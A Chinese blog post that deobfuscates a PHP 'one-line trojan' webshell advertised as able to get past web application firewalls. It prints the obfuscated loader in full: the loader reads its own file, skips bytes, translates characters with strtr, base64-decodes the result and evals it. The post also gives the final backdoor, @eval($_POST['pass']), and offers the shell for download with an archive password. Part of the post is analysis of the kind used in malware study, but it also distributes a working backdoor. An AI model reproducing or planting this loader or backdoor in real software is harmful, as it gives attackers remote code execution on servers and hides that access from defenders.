一款过waf的一句话木马分析

  • A+
所属分类:颓废's Blog
摘要

中午,下班回来,就看一个朋友给我发了几个马儿  让我看看解解密码  很简单

中午,下班回来,就看一个朋友给我发了几个马儿  让我看看解解密码  很简单

一款过waf的一句话木马分析一款过waf的一句话木马分析

猛不猛我不知道   那时候手机  太长的看着就烦   就回到家瞅瞅了

首先我们看这个马儿

一款过waf的一句话木马分析

一步步来,先分析前面的。前面的PHP代码部分有一个eval,我们改成echo试试

一款过waf的一句话木马分析

输出得到

$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb');$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};$OO0OO000O($O000O0O00,1136);$OO00O00O0=($OOO0000O0($OO0OO00O0($OO0OO000O($O000O0O00,380),'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));eval($OO00O00O0); 

替换进去得到

一款过waf的一句话木马分析

下来我们就要分析了

<?php $OOO0O0O00=__FILE__; //$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');  $OOO000000='th6sbehqla4co_sadfpnr';  $OO00O0000=248;  //$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}; //$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16}; //$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5}; $OOO0000O0='base64_decode';  $O0O0000O0='OOO0000O0';  //$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19}; $OO0OO0000='fopen';  //if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb'); $O000O0O00=fopen($OOO0O0O00,'rb');  //$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16}; $OO0OO000O=='fread';  //$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20}; $OO0OO00O0='strtr';  //$OO0OO000O($O000O0O00,1136); fread($O000O0O00,1136);  /*$OO00O00O0=($OOO0000O0(     $OO0OO00O0(              $OO0OO000O($O000O0O00,380),     '7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',     'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'     )    ) );*/  $OO00O00O0=(base64_decode(  strtr(   $OO0OO000O($O000O0O00,380),   '7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',   'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'   )  ) );   ;eval($OO00O00O0); return; ?>

分析后总结得到

$OOO0O0O00=__FILE__;//获取当前文件名 $O000O0O00=fopen($OOO0O0O00,'rb');//打开文件 fread($O000O0O00,248);//跳过248字节 $OO00O00O0=(base64_decode(  strtr(   fread($O000O0O00,380),   '7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',   'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'   )  ) );//读取380字节,根据代码表替换字符,base64解码 eval($OO00O00O0);//执行解码后的代码

一款过waf的一句话木马分析

解得

@eval($_POST['pass']);//密码就等于pass

怎么解得卖个关子  不会的可以看看

管理员设置 回复 可见隐藏内容




  文件名稱:一句话木马

  更新時間:

  下載声明:密码: gadu

立即下載

下载链接

网盘下载

密码: gadu

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: